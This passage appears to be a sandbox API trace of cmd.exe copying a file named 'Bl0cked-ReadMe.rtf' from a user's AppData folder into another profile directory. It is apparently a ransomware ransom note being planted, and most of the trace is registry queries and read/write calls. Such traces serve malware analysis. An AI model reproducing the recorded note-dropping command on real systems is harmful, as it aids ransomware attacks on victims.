out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x40, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegCloseKey (hKey=0x40) returned 0x0 [0216.603] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cec6c | out: phkResult=0x1cec6c*=0x40) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x40, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x1, lpcbData=0x1cec70*=0x4) 
returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x1, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x0, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x9, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x4, lpData=0x1cec78*=0x9, lpcbData=0x1cec70*=0x4) returned 0x0 [0216.603] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cec74, lpData=0x1cec78, lpcbData=0x1cec70*=0x1000 | out: lpType=0x1cec74*=0x0, lpData=0x1cec78*=0x9, lpcbData=0x1cec70*=0x1000) returned 0x2 [0216.603] RegCloseKey (hKey=0x40) returned 0x0 [0216.603] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b2 [0216.603] srand (_Seed=0x5b8863b2) [0216.603] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"" [0216.603] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf\"" [0216.604] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.604] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2918c8, nSize=0x104 | out: 
lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0216.604] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.604] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.604] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.604] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.604] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.604] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.604] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.604] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.604] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.604] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.604] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.604] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.604] GetEnvironmentStringsW () returned 0x2922b8* [0216.604] FreeEnvironmentStringsW (penv=0x2922b8) returned 1 [0216.604] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.604] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.604] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.605] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.605] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.605] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
[0216.605] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.605] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.605] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.605] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.605] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cfa38 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.605] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cfa38, lpFilePart=0x1cfa34 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cfa34*="Desktop") returned 0x18 [0216.605] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.605] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf7b4 | out: lpFindFileData=0x1cf7b4) returned 0x28fff8 [0216.605] FindClose (in: hFindFile=0x28fff8 | out: hFindFile=0x28fff8) returned 1 [0216.605] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf7b4 | out: lpFindFileData=0x1cf7b4) returned 0x28fff8 [0216.605] FindClose (in: hFindFile=0x28fff8 | out: hFindFile=0x28fff8) returned 1 [0216.605] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf7b4 | out: lpFindFileData=0x1cf7b4) returned 0x28fff8 [0216.605] FindClose (in: hFindFile=0x28fff8 | out: hFindFile=0x28fff8) returned 1 [0216.605] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.606] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0216.606] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0216.606] GetEnvironmentStringsW () returned 0x292ad8* [0216.606] FreeEnvironmentStringsW (penv=0x292ad8) returned 1 [0216.606] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.606] GetConsoleOutputCP () returned 0x1b5 [0216.606] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.606] GetUserDefaultLCID () returned 0x409 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a374950, cchData=8 | out: lpLCData=":") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfb78, cchData=128 | out: lpLCData="0") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfb78, cchData=128 | out: lpLCData="0") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfb78, cchData=128 | out: lpLCData="1") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a374940, cchData=8 | out: lpLCData="/") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a374d80, cchData=32 | out: lpLCData="Mon") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a374d40, cchData=32 | out: lpLCData="Tue") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a374d00, cchData=32 | out: lpLCData="Wed") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a374cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a374c80, cchData=32 | out: lpLCData="Fri") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a374c40, cchData=32 | out: lpLCData="Sat") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a374c00, cchData=32 | out: lpLCData="Sun") returned 4 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a374930, cchData=8 | out: lpLCData=".") returned 2 [0216.607] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a374920, cchData=8 | out: lpLCData=",") returned 2 
[0216.607] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0216.608] GetConsoleTitleW (in: lpConsoleTitle=0x2808d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.608] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.608] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0216.608] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0216.608] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0216.609] _wcsicmp (_String1="type", _String2=")") returned 75 [0216.609] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0216.609] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0216.609] _wcsicmp (_String1="IF", _String2="type") returned -11 [0216.609] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0216.609] _wcsicmp (_String1="REM", _String2="type") returned -2 [0216.609] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0216.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.612] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.612] GetFileType (hFile=0x7) returned 0x2 [0216.613] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0216.613] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cfa70 | out: lpMode=0x1cfa70) returned 1 [0216.613] _dup (_FileHandle=1) returned 3 [0216.613] _close (_FileHandle=1) returned 0 [0216.613] _wcsicmp (_String1="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0216.613] CreateFileW (lpFileName="C:\\Users\\Default\\Searches\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\default\\searches\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cfa40, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0216.614] _open_osfhandle 
(_OSFileHandle=0x4c, _Flags=8) returned 1 [0216.614] GetConsoleTitleW (in: lpConsoleTitle=0x1cf870, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.615] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0216.615] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0216.615] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0216.615] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0216.616] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.616] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cf3d4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf3d4) returned 0x280e50 [0216.616] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0216.616] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0216.616] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0216.616] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ce2e0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0216.617] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0216.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.617] GetFileType (hFile=0x54) returned 0x1 [0216.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.617] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ce338 | out: lpFileSizeHigh=0x1ce338*=0x0) returned 0x1632 [0216.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.617] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | 
out: lpDistanceToMoveHigh=0x0) returned 0x0 [0216.617] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.617] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.618] GetFileType (hFile=0x4c) returned 0x1 [0216.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.618] GetFileType (hFile=0x4c) returned 0x1 [0216.618] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.618] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] GetFileType (hFile=0x4c) returned 0x1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] GetFileType (hFile=0x4c) returned 0x1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] GetFileType (hFile=0x4c) returned 0x1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 
[0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] GetFileType (hFile=0x4c) returned 0x1 [0216.619] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.619] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.620] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.620] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.620] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.620] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.621] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.621] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType 
(hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.621] GetFileType (hFile=0x4c) returned 0x1 [0216.621] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf2b0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf300*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf300*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf350*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf350*, lpNumberOfBytesWritten=0x1ce354*=0x20, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.622] SetFilePointerEx (in: hFile=0x54, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce340 | out: lpNewFilePointer=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=4) returned 0x54 [0216.622] ReadFile (in: hFile=0x54, lpBuffer=0x1cf170, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce360, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesRead=0x1ce360*=0x200, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf170*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf1c0*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf210*, lpNumberOfBytesWritten=0x1ce354*=0x50, lpOverlapped=0x0) returned 1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] GetFileType (hFile=0x4c) returned 0x1 [0216.622] _get_osfhandle (_FileHandle=1) returned 0x4c [0216.622] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf260*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce354, lpOverlapped=0x0 | out: lpBuffer=0x1cf260*, 
